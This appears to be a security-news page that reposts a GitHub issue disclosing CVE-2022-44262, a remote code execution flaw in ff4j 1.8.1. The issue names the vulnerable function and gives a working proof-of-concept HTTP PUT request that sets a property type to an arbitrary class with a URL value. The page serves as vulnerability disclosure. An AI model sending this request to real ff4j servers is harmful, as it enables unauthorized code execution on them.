Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-44262: CVE-2022-44262 · Issue #624 · ff4j/ff4j

ff4j 1.8.1 is vulnerable to Remote Code Execution (RCE).

CVE
Open in Source
#js#git#java#rce

ff4j can be use to call any constructors in the project or jvm.
it would raise an error after constructor call and give an error in response.

File: https://github.com/ff4j/ff4j/blob/master/ff4j-core/src/main/java/org/ff4j/property/util/PropertyFactory.java
Function: public static Property<?> createProperty(String pName, String pType, String pValue, String desc, Set < String > fixedValues)
Line:163 and 164


git clone https://github.com/ff4j/ff4j-samples.git
cd spring-boot-2x/ff4j-sample-springboot2x
mvn spring-boot:run


PUT /api/ff4j/propertyStore/properties/test HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
accept: application/json
Content-Length: 111

{ "name": "test", "description": null, "type": "org.springframework.core.io.support.ResourcePropertySource", "value": "http://example/index.html"}

Related news

GHSA-65hj-9ppw-77xc: ff4j is vulnerable to Remote Code Execution (RCE)

ff4j 1.8.1 is vulnerable to Remote Code Execution (RCE).

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE